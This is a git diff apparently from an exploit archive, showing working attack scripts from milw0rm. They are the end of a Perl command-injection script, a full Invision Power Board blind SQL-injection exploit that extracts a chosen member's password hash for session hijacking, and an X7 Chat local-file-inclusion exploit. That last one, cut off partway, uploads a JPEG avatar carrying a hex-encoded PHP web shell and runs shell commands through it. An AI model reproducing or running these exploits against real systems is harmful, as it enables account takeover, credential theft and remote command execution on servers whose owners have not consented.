+	$cij->proxy("http", "http://".$proxy."/") unless !$proxy;
+
+	$string  = "%65%63%68%6F%20%5F%63%69%6A%66%65%72%5F%3B%20";
+	$string .= uri_escape(shift);
+	$string .= "%3B%20%65%63%68%6F%20%5F%63%69%6A%66%65%72%5F";
+
+	$out=$cij->get($host."/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=".$shell.$string);
+
+	if($out->is_success)
+	{
+		@cij=split("_cijfer_",$out->content);
+		print substr(@cij[1],1);
+	}
+
+	if($verbose)
+	{
+		$recv=length $out->content;
+		print "Total received bytes: ".$recv."\n";
+		$sent=length $command;
+		print "Total sent bytes: ".$sent."\n";
+	}
+}
+
+# milw0rm.com [2006-04-30]
diff --git a/platforms/php/webapps/1733.pl b/platforms/php/webapps/1733.pl
index e6deb6241..2502ba2ec 100755
--- a/platforms/php/webapps/1733.pl
+++ b/platforms/php/webapps/1733.pl
@@ -1,187 +1,187 @@
-#!/usr/bin/perl
-#############################################################################
-## IPB <=2.1.4 exploit (possibly 2.1.5 too)                                ##
-## Brought to you by the Ykstortion security team.                         ##
-##                                                                         ##
-## The bug is in the pm system so you must have a registered user.         ##
-## The exploit will extract a password hash from the forum's data base of  ##
-## the target user.                                                        ##
-## You need to know the target user's member ID but it's not difficult to  ##
-## find out, just look under their avatar next to one of their posts.      ##
-## Once you have the hash, simply unset all forum cookies and set          ##
-## member_id to the target user's member id and pass_hash to the hash      ##
-## obtained from the database by this script.                              ##
-##                                                                         ##
-## Usage:                                                                  ##
-##   $ ./ipb                                                               ##
-##   IPB Forum URL ? forums.example.com/forums                             ##
-##   Your username ? krypt_sk1dd13                                         ##
-##   Your pass ? if_your_on_nix_this_gets_hidden                           ##
-##   Target userid ? 3637                                                  ##
-##                                                                         ##
-##   Attempting to extract password hash from database...                  ##
-##   537ab2d5b37ac3a3632f5d06e8e04368                                      ##
-##   Hit enter to quit.                                                    ##
-##                                                                         ##
-## Requirements:                                                           ##
-##   o Perl 5                                                              ##
-##   o LWP 5.64 or later                                                   ##
-##   o Internet access                                                     ##
-##   o A forum you hate/dislike                                            ##
-##   o A user on said forum                                                ##
-##   o 32+ PMs left till your inbox is full, if not you can still delete   ##
-##     PMs from your inbox as the successful ones come through             ##
-##                                                                         ##
-## Credit to: Nuticulus for finding the SQL injection                      ##
-##                                                                         ##
-## Have fun, you dumb skiddie.                                             ##
-#############################################################################
-
-use HTTP::Cookies;
-use LWP 5.64;
-use HTTP::Request;
-
-# variables
-my $login_page = '?act=Login&CODE=01';
-my $pm_page = '?act=Msg&CODE=04';
-my $pose_pm_page = '?';
-my $tries = 5;
-my $sql = '';
-my $hash = '';
-my $need_null = 0;
-my $i;
-my $j;
-my @charset = ('0' .. '9', 'a' .. 'f');
-my %form = (act		=> 'Msg',
-	CODE		=> '04',
-	MODE		=> '01',
-	OID		=> '',
-	removeattachid	=> '',
-	msg_title	=> 'asdf',
-	bbmode		=> 'normal',
-	ffont		=> 0,
-	fsize		=> 0,
-	fcolor		=> 0,
-	LIST		=> ' LIST ',
-	helpbox		=> 'Insert Monotype Text (alt + p)',
-	tagcount	=> 0,
-	Post		=> 'jkl');
-	
-
-# objects
-my $ua = LWP::UserAgent->new;
-my $cj = HTTP::Cookies->new (file => "N/A", autosave => 0);
-my $resp;
-
-# init the cookie jar
-$ua->cookie_jar ($cj);
-
-# allow redirects on post requests
-push @{ $ua->requests_redirectable }, "POST";
-
-# get user input
-print 'IPB Forum URL ? ';
-chomp (my $base_url = <STDIN>);
-print 'Your username ? ';
-chomp (my $user = <STDIN>);
-$form{entered_name} = $user;
-print 'Your pass ? ';
-# systems without stty will error otherwise
-my $stty = -x '/bin/stty';
-system 'stty -echo' if $stty;		# to turn off echoing
-chomp (my $pass = <STDIN>);
-system 'stty echo' if $stty;		# to turn it back on
-print "\n" if $stty;
-print 'Target userid ? ';	# it'll say next to one of their posts
-chomp (my $tid = <STDIN>);
-
-# parse the given base url
-if ($base_url !~ m#^http://#) { $base_url = 'http://' . $base_url }
-if ($base_url !~ m#/$|index\.php$#) { $base_url .= '/' }
-
-do {
-	$resp = $ua->post ($base_url . $login_page,
-		[ UserName => $user,
-		  PassWord => $pass,
-		  CookieDate => 1,
-		]);
-} while ($tries-- && !$resp->is_success());
-
-# reset tries
-$tries = 5;
-
-# did we get 200 (OK) ?
-if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "\n" }
-
-# was the pass right ?
-if ($resp->content =~ /sorry, the password was wrong/i) {
-	die "Error: password incorrect.\n";
-}
-
-# get ourselves a post_key (and an auth_key too with newer versions)
-do {
-	$resp = $ua->get ($base_url . $pm_page);
-} while ($tries-- && !$resp->is_success());
-
-# reset tries
-$tries = 5;
-
-if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "\n" }
-if ($resp->content =~ m#<input\s+?type=["']?hidden["']?\s+?name=["']?post_key["']?\s+?value=["']?([0-9a-f]{32})["']?\s+?/>#)
-{
-	$form{post_key} = $1;
-} else {
-	die "Error: couldn't get a post key.\n";
-}
-if ($resp->content =~ m#<input\s+?type=["']?hidden["']?\s+?name=["']?auth_key["']?\s+?value=["']?([0-9a-f]{32})["']?\s+/>#)
-{
-	$form{auth_key} = $1;
-}
-
-# turn off buffering so chars in the hash show up straight away
-$| = 1;
-
-print "\nAttempting to extract password hash from database...\n ";
-
-OFFSET:
-for ($i = 0; $i < 32; ++$i) {
-	CHAR:
-	for ($j = 0; $j < @charset; ++$j) {
-		# reset tries
-		$tries = 5;
-		print "\x08", $charset[$j];
-		# build sql injection
-		$sql = '-1 UNION SELECT ' . ($need_null ? '0, ' : '') . 'CHAR('
-		     . (join (',', map {ord} split ('', $user))) . ') FROM '
-		     . 'ibf_members WHERE id = ' . $tid . ' AND MID('
-		     . 'member_login_key, ' . ($i + 1) . ', 1) = CHAR('
-		     . ord ($charset[$j]) . ')';
-		$form{from_contact} = $sql;
-		$resp = $ua->post ($base_url . $post_pm_page, \%form,
-			referer => $base_url . $pm_page);
-		if (!$resp->is_success()) {
-			die "\nError: " . $resp->status_line
-			  . "\n" if (!$tries);
-			--$tries;
-			redo;
-		}
-		if ($resp->content =~ /sql error/i) {
-			if ($need_null) {
-				die "Error: SQL error.\n";
-			} else {
-				$need_null = 1;
-				redo OFFSET;
-			}
-		} elsif ($resp->content !~ /there is no such member/i) {
-			# we have a winner !
-			print ' ';
-			next OFFSET;
-		}
-	}
-	# uh oh, something went wrong
-	die "\nError: couldn't get a char for offset $i\n";
-}
-print "\x08 \x08\nHit enter to quit.\n";
-<STDIN>;
-
-# milw0rm.com [2006-05-01]
+#!/usr/bin/perl
+#############################################################################
+## IPB <=2.1.4 exploit (possibly 2.1.5 too)                                ##
+## Brought to you by the Ykstortion security team.                         ##
+##                                                                         ##
+## The bug is in the pm system so you must have a registered user.         ##
+## The exploit will extract a password hash from the forum's data base of  ##
+## the target user.                                                        ##
+## You need to know the target user's member ID but it's not difficult to  ##
+## find out, just look under their avatar next to one of their posts.      ##
+## Once you have the hash, simply unset all forum cookies and set          ##
+## member_id to the target user's member id and pass_hash to the hash      ##
+## obtained from the database by this script.                              ##
+##                                                                         ##
+## Usage:                                                                  ##
+##   $ ./ipb                                                               ##
+##   IPB Forum URL ? forums.example.com/forums                             ##
+##   Your username ? krypt_sk1dd13                                         ##
+##   Your pass ? if_your_on_nix_this_gets_hidden                           ##
+##   Target userid ? 3637                                                  ##
+##                                                                         ##
+##   Attempting to extract password hash from database...                  ##
+##   537ab2d5b37ac3a3632f5d06e8e04368                                      ##
+##   Hit enter to quit.                                                    ##
+##                                                                         ##
+## Requirements:                                                           ##
+##   o Perl 5                                                              ##
+##   o LWP 5.64 or later                                                   ##
+##   o Internet access                                                     ##
+##   o A forum you hate/dislike                                            ##
+##   o A user on said forum                                                ##
+##   o 32+ PMs left till your inbox is full, if not you can still delete   ##
+##     PMs from your inbox as the successful ones come through             ##
+##                                                                         ##
+## Credit to: Nuticulus for finding the SQL injection                      ##
+##                                                                         ##
+## Have fun, you dumb skiddie.                                             ##
+#############################################################################
+
+use HTTP::Cookies;
+use LWP 5.64;
+use HTTP::Request;
+
+# variables
+my $login_page = '?act=Login&CODE=01';
+my $pm_page = '?act=Msg&CODE=04';
+my $pose_pm_page = '?';
+my $tries = 5;
+my $sql = '';
+my $hash = '';
+my $need_null = 0;
+my $i;
+my $j;
+my @charset = ('0' .. '9', 'a' .. 'f');
+my %form = (act		=> 'Msg',
+	CODE		=> '04',
+	MODE		=> '01',
+	OID		=> '',
+	removeattachid	=> '',
+	msg_title	=> 'asdf',
+	bbmode		=> 'normal',
+	ffont		=> 0,
+	fsize		=> 0,
+	fcolor		=> 0,
+	LIST		=> ' LIST ',
+	helpbox		=> 'Insert Monotype Text (alt + p)',
+	tagcount	=> 0,
+	Post		=> 'jkl');
+	
+
+# objects
+my $ua = LWP::UserAgent->new;
+my $cj = HTTP::Cookies->new (file => "N/A", autosave => 0);
+my $resp;
+
+# init the cookie jar
+$ua->cookie_jar ($cj);
+
+# allow redirects on post requests
+push @{ $ua->requests_redirectable }, "POST";
+
+# get user input
+print 'IPB Forum URL ? ';
+chomp (my $base_url = <STDIN>);
+print 'Your username ? ';
+chomp (my $user = <STDIN>);
+$form{entered_name} = $user;
+print 'Your pass ? ';
+# systems without stty will error otherwise
+my $stty = -x '/bin/stty';
+system 'stty -echo' if $stty;		# to turn off echoing
+chomp (my $pass = <STDIN>);
+system 'stty echo' if $stty;		# to turn it back on
+print "\n" if $stty;
+print 'Target userid ? ';	# it'll say next to one of their posts
+chomp (my $tid = <STDIN>);
+
+# parse the given base url
+if ($base_url !~ m#^http://#) { $base_url = 'http://' . $base_url }
+if ($base_url !~ m#/$|index\.php$#) { $base_url .= '/' }
+
+do {
+	$resp = $ua->post ($base_url . $login_page,
+		[ UserName => $user,
+		  PassWord => $pass,
+		  CookieDate => 1,
+		]);
+} while ($tries-- && !$resp->is_success());
+
+# reset tries
+$tries = 5;
+
+# did we get 200 (OK) ?
+if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "\n" }
+
+# was the pass right ?
+if ($resp->content =~ /sorry, the password was wrong/i) {
+	die "Error: password incorrect.\n";
+}
+
+# get ourselves a post_key (and an auth_key too with newer versions)
+do {
+	$resp = $ua->get ($base_url . $pm_page);
+} while ($tries-- && !$resp->is_success());
+
+# reset tries
+$tries = 5;
+
+if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "\n" }
+if ($resp->content =~ m#<input\s+?type=["']?hidden["']?\s+?name=["']?post_key["']?\s+?value=["']?([0-9a-f]{32})["']?\s+?/>#)
+{
+	$form{post_key} = $1;
+} else {
+	die "Error: couldn't get a post key.\n";
+}
+if ($resp->content =~ m#<input\s+?type=["']?hidden["']?\s+?name=["']?auth_key["']?\s+?value=["']?([0-9a-f]{32})["']?\s+/>#)
+{
+	$form{auth_key} = $1;
+}
+
+# turn off buffering so chars in the hash show up straight away
+$| = 1;
+
+print "\nAttempting to extract password hash from database...\n ";
+
+OFFSET:
+for ($i = 0; $i < 32; ++$i) {
+	CHAR:
+	for ($j = 0; $j < @charset; ++$j) {
+		# reset tries
+		$tries = 5;
+		print "\x08", $charset[$j];
+		# build sql injection
+		$sql = '-1 UNION SELECT ' . ($need_null ? '0, ' : '') . 'CHAR('
+		     . (join (',', map {ord} split ('', $user))) . ') FROM '
+		     . 'ibf_members WHERE id = ' . $tid . ' AND MID('
+		     . 'member_login_key, ' . ($i + 1) . ', 1) = CHAR('
+		     . ord ($charset[$j]) . ')';
+		$form{from_contact} = $sql;
+		$resp = $ua->post ($base_url . $post_pm_page, \%form,
+			referer => $base_url . $pm_page);
+		if (!$resp->is_success()) {
+			die "\nError: " . $resp->status_line
+			  . "\n" if (!$tries);
+			--$tries;
+			redo;
+		}
+		if ($resp->content =~ /sql error/i) {
+			if ($need_null) {
+				die "Error: SQL error.\n";
+			} else {
+				$need_null = 1;
+				redo OFFSET;
+			}
+		} elsif ($resp->content !~ /there is no such member/i) {
+			# we have a winner !
+			print ' ';
+			next OFFSET;
+		}
+	}
+	# uh oh, something went wrong
+	die "\nError: couldn't get a char for offset $i\n";
+}
+print "\x08 \x08\nHit enter to quit.\n";
+<STDIN>;
+
+# milw0rm.com [2006-05-01]
diff --git a/platforms/php/webapps/1738.php b/platforms/php/webapps/1738.php
index e17a87411..b54068e32 100755
--- a/platforms/php/webapps/1738.php
+++ b/platforms/php/webapps/1738.php
@@ -1,283 +1,283 @@
-#!/usr/bin/php -q -d short_open_tag=on
-<?
-echo "X7 Chat <=2.0 \"help_file\" arbitrary local inclusion\r\n";
-echo "by rgod rgod@autistici.org\r\n";
-echo "site: http://retrogod.altervista.org\r\n";
-echo "-> works regardless of magic_quotes_gpc settings\r\n";
-echo "   if avatar uploads are enabled (default)\r\n";
-echo "dork: intitle:\"X7 Chat Help Center\" | \"Powered By X7 Chat\"\r\n\r\n";
-
-if ($argc<4) {
-echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
-echo "host:      target server (ip/hostname)\r\n";
-echo "path:      path to X7\r\n";
-echo "cmd:       a shell command\r\n";
-echo "Options:\r\n";
-echo "   -p[port]:    specify a port other than 80\r\n";
-echo "   -P[ip:port]: specify a proxy\r\n";
-echo "Examples:\r\n";
-echo "php ".$argv[0]." localhost /X7/ cat ./../config.php\r\n";
-echo "php ".$argv[0]." localhost /X7/ ls -la -p81\r\n";
-echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n";
-die;
-}
-
-/*
- software site: http://www.x7chat.com/
- description: "X7 Chat is free, open source, software written in PHP"
-
- vulnerable code in help/index.php at lines 32-37:
-
- ...
- if(!isset($_GET['help_file']) || !@is_file("./{$_GET['help_file']}")){
-		$_GET['help_file'] = "main";
-	}
-
-	// Load the help definitions
-	include("./{$_GET['help_file']}");
-...
-
-so, you can view/include all files on target system, poc:
-
-http://[target]/[path]/help/index.php?help_file=../../../../../../etc/passwd
-
-this tool upload an avatar with php code as EXIF metadata content, then:
-
-http://[target]/[path]/help/index.php?help_file=../uploads/avatar_[username].jpeg&cmd=ls%20-la
-									      */
-
-error_reporting(0);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-
-function quick_dump($string)
-{
-  $result='';$exa='';$cont=0;
-  for ($i=0; $i<=strlen($string)-1; $i++)
-  {
-   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-  #debug
-  #echo "\r\n".$html;
-}
-
-function make_seed()
-{
-   list($usec, $sec) = explode(' ', microtime());
-   return (float) $sec + ((float) $usec * 100000);
-}
-
-
-$host=$argv[1];
-$path=$argv[2];
-$cmd="";$port=80;$proxy="";
-
-for ($i=3; $i<=$argc-1; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>"-p") and ($temp<>"-P"))
-{$cmd.=" ".$argv[$i];}
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-$cmd=urlencode($cmd);
-if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-
-srand(make_seed());
-$v = rand(1,99);
-
-echo "step 1 -> register...\r\n";
-$data="username=suntzu".$v;
-$data.="&pass1=suntzu";
-$data.="&pass2=suntzu";
-$data.="&email=suntzu".$v."@hotmail.com";
-$packet ="POST ".$p."index.php?act=register&step=1 HTTP/1.0\r\n";
-$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-$packet.=$data;
-#debug
-#echo quick_dump($packet);
-sendpacketii($packet);
-
-echo "step 2 -> login...\r\n";
-$data="dologin=dologin";
-$data.="&username=suntzu".$v;
-$data.="&password=suntzu";
-$packet="POST ".$p."index.php HTTP/1.0\r\n";
-$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-$packet.=$data;
-#debug
-#echo quick_dump($packet);
-sendpacketii($packet);
-$temp=explode("Set-Cookie: ",$html);
-$temp2=explode(" ",$temp[1]);$cookie=$temp2[0];
-$temp2=explode(" ",$temp[2]);$cookie.=" ".$temp2[0];
-if ($cookie=="") {die("Failed to login...\r\n");}
-echo "Cookie -> ".$cookie."\r\n";
-echo "step 3 -> upload an avatar...\r\n";
-$shell=
-chr(0xff).chr(0xd8).chr(0xff).chr(0xfe).chr(0x00).chr(0xcf).chr(0x3c).chr(0x3f).
-chr(0x70).chr(0x68).chr(0x70).chr(0x0d).chr(0x0a).chr(0x69).chr(0x66).chr(0x20).
-chr(0x28).chr(0x67).chr(0x65).chr(0x74).chr(0x5f).chr(0x6d).chr(0x61).chr(0x67).
-chr(0x69).chr(0x63).chr(0x5f).chr(0x71).chr(0x75).chr(0x6f).chr(0x74).chr(0x65).
-chr(0x73).chr(0x5f).chr(0x67).chr(0x70).chr(0x63).chr(0x28).chr(0x29).chr(0x29).
-chr(0x7b).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).
-chr(0x45).chr(0x5b).chr(0x27).chr(0x63).chr(0x6d).chr(0x64).chr(0x27).chr(0x5d).
-chr(0x3d).chr(0x73).chr(0x74).chr(0x72).chr(0x69).chr(0x70).chr(0x73).chr(0x6c).
-chr(0x61).chr(0x73).chr(0x68).chr(0x65).chr(0x73).chr(0x28).chr(0x24).chr(0x5f).
-chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).chr(0x27).
-chr(0x63).chr(0x6d).chr(0x64).chr(0x27).chr(0x5d).chr(0x29).chr(0x3b).chr(0x7d).
-chr(0x0d).chr(0x0a).chr(0x65).chr(0x72).chr(0x72).chr(0x6f).chr(0x72).chr(0x5f).
-chr(0x72).chr(0x65).chr(0x70).chr(0x6f).chr(0x72).chr(0x74).chr(0x69).chr(0x6e).
-chr(0x67).chr(0x28).chr(0x30).chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x69).
-chr(0x6e).chr(0x69).chr(0x5f).chr(0x73).chr(0x65).chr(0x74).chr(0x28).chr(0x22).
-chr(0x6d).chr(0x61).chr(0x78).chr(0x5f).chr(0x65).chr(0x78).chr(0x65).chr(0x63).
-chr(0x75).chr(0x74).chr(0x69).chr(0x6f).chr(0x6e).chr(0x5f).chr(0x74).chr(0x69).
-chr(0x6d).chr(0x65).chr(0x22).chr(0x2c).chr(0x30).chr(0x29).chr(0x3b).chr(0x0d).
-chr(0x0a).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).chr(0x20).chr(0x22).chr(0x35).
-chr(0x36).chr(0x37).chr(0x38).chr(0x39).chr(0x22).chr(0x3b).chr(0x0d).chr(0x0a).
-chr(0x70).chr(0x61).chr(0x73).chr(0x73).chr(0x74).chr(0x68).chr(0x72).chr(0x75).
-chr(0x28).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).
-chr(0x45).chr(0x5b).chr(0x22).chr(0x63).chr(0x6d).chr(0x64).chr(0x22).chr(0x5d).
-chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).
-chr(0x20).chr(0x22).chr(0x35).chr(0x36).chr(0x37).chr(0x38).chr(0x39).chr(0x22).
-chr(0x3b).chr(0x0d).chr(0x0a).chr(0x64).chr(0x69).chr(0x65).chr(0x3b).chr(0x0d).
-chr(0x0a).chr(0x3f).chr(0x3e).chr(0xff).chr(0xe0).chr(0x00).chr(0x10).chr(0x4a).
-chr(0x46).chr(0x49).chr(0x46).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x00).
-chr(0x48).chr(0x00).chr(0x48).chr(0x00).chr(0x00).chr(0xff).chr(0xdb).chr(0x00).
-chr(0x43).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0xff).chr(0xdb).chr(0x00).chr(0x43).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0xff).
-chr(0xc0).chr(0x00).chr(0x11).chr(0x08).chr(0x00).chr(0x01).chr(0x00).chr(0x01).
-chr(0x03).chr(0x01).chr(0x11).chr(0x00).chr(0x02).chr(0x11).chr(0x01).chr(0x03).
-chr(0x11).chr(0x01).chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x00).chr(0x01).
-chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
-chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x09).
-chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x10).chr(0x01).chr(0x00).chr(0x00).
-chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
-chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xc4).
-chr(0x00).chr(0x14).chr(0x01).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
-chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
-chr(0x00).chr(0x00).chr(0x00).chr(0x06).chr(0xff).chr(0xc4).chr(0x00).chr(0x14).
-chr(0x11).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
-chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
-chr(0x00).chr(0x00).chr(0xff).chr(0xda).chr(0x00).chr(0x0c).chr(0x03).chr(0x01).
-chr(0x00).chr(0x02).chr(0x11).chr(0x03).chr(0x11).chr(0x00).chr(0x3f).chr(0x00).
-chr(0x3f).chr(0xc1).chr(0xc7).chr(0xdf).chr(0xff).chr(0xd9).chr(0x00).chr(0x00);
-
-$data='-----------------------------7d63ba6e09fc
-Content-Disposition: form-data; name="MAX_FILE_SIZE"
-
-5242880
------------------------------7d63ba6e09fc
-Content-Disposition: form-data; name="avatar"; filename="whatever.jpg"
-Content-Type: image/jpeg
-
-'.$shell.'
------------------------------7d63ba6e09fc--
-';
-
-echo "step 4 -> launch commands...\r\n";
-$packet="POST ".$p."index.php?act=usercp&cp_page=upload&uploaded=1 HTTP/1.0\r\n";
-$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d63ba6e09fc\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Cookie: ".$cookie."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-$packet.=$data;
-#debug
-#echo quick_dump($packet);
-sendpacketii($packet);
-
-$path_to_shell=urlencode("../uploads/avatar_suntzu".$v.".jpeg");
-$packet ="GET ".$p."help/index.php?help_file=".$path_to_shell." HTTP/1.0\r\n";
-$packet.="User-Agent: Googlebot/2.1\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Cookie: cmd=".$cmd."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-#debug
-#echo quick_dump($packet);
-sendpacketii($packet);
-if (strstr($html,"56789"))
-  {
-    echo "Exploit succeeded...\r\n\r\n";
-    $temp=explode("56789",$html);
-    echo $temp[1];
-    die;
-  }
-//if you are here...
-echo "Exploit failed...";
-?>
-
-# milw0rm.com [2006-05-02]
+#!/usr/bin/php -q -d short_open_tag=on
+<?
+echo "X7 Chat <=2.0 \"help_file\" arbitrary local inclusion\r\n";
+echo "by rgod rgod@autistici.org\r\n";
+echo "site: http://retrogod.altervista.org\r\n";
+echo "-> works regardless of magic_quotes_gpc settings\r\n";
+echo "   if avatar uploads are enabled (default)\r\n";
+echo "dork: intitle:\"X7 Chat Help Center\" | \"Powered By X7 Chat\"\r\n\r\n";
+
+if ($argc<4) {
+echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
+echo "host:      target server (ip/hostname)\r\n";
+echo "path:      path to X7\r\n";
+echo "cmd:       a shell command\r\n";
+echo "Options:\r\n";
+echo "   -p[port]:    specify a port other than 80\r\n";
+echo "   -P[ip:port]: specify a proxy\r\n";
+echo "Examples:\r\n";
+echo "php ".$argv[0]." localhost /X7/ cat ./../config.php\r\n";
+echo "php ".$argv[0]." localhost /X7/ ls -la -p81\r\n";
+echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n";
+die;
+}
+
+/*
+ software site: http://www.x7chat.com/
+ description: "X7 Chat is free, open source, software written in PHP"
+
+ vulnerable code in help/index.php at lines 32-37:
+
+ ...
+ if(!isset($_GET['help_file']) || !@is_file("./{$_GET['help_file']}")){
+		$_GET['help_file'] = "main";
+	}
+
+	// Load the help definitions
+	include("./{$_GET['help_file']}");
+...
+
+so, you can view/include all files on target system, poc:
+
+http://[target]/[path]/help/index.php?help_file=../../../../../../etc/passwd
+
+this tool upload an avatar with php code as EXIF metadata content, then:
+
+http://[target]/[path]/help/index.php?help_file=../uploads/avatar_[username].jpeg&cmd=ls%20-la
+									      */
+
+error_reporting(0);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+
+function quick_dump($string)
+{
+  $result='';$exa='';$cont=0;
+  for ($i=0; $i<=strlen($string)-1; $i++)
+  {
+   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
